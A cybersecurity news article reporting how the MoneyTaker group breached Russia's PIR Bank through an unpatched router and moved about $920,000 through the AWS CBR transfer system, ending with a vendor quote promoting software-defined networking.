An infamous attacker group has stolen over a million dollars from the PIR Bank in Russia after it breached the bank’s network via an unpatched router.
The victim lost around $920,000 in funds which were being kept in a corresponding Bank of Russia account.
The Russian Cyber Security firm, Group IB has been identified as the investigating firm, where after examining the affected servers and workstations, they have successfully gathered “irrefutable digital evidence” that implicated MoneyTaker was indeed the culprit.
This MoneyTaker has been found linked with the thievery within UK, US and Russian financial institutions and banks that are dating back to 2016.
According to the Group-IB experts, The MoneyTaker hackers on banks specially focused on the infiltration of inter-banking card processing and funds transfer systems like the Automated Work Station Client of the Russian Central Bank or AWS CBR and the First Data STAR Network.
Attackers have then infected the financial institutions’ local network with the malware using by the same router. PowerShell scripts were also used to acquire the persistence and to perform the malicious operations, all which were avoiding the detection.
When the attackers finally breached the institution’s main network, they have now the full access to the bank’s AWS CBR accounts which is the system that gains the control of financial transactions.
Using that system, the hackers have successfully transferred the amount from the PIR Bank’s of Russia account to 17 different accounts, one they had created beforehand, and then money mules withdrew the funds from ATMs in Russia moments later.
The PIR Bank employees have uncovered the hack by the following day, July 4th, but that was too late for the transactions to be reversed back.
Exclusive insight has been given to the LHN from Ken Hosac, VP of the IoT Strategy & Business Development at Cradlepoint:
“Software-defined Networking (SDN) enables IoT devices, such as routers, to be deployed on a completely separate network (virtually) that is invisible to the outside world. Traditional networks utilise a “connect first, authenticate second” model that allows hackers to scan networks for devices and their ports using common hacking tools. Those same hacking tools are then used to defeat the authentication. A key benefit of SDN is the model of “authenticate first, connect second”. These networks are completely invisible and inaccessible unless the organisation’s IoT devices are first properly authenticated. This means that it is much more difficult for routers to be exploited by hackers.”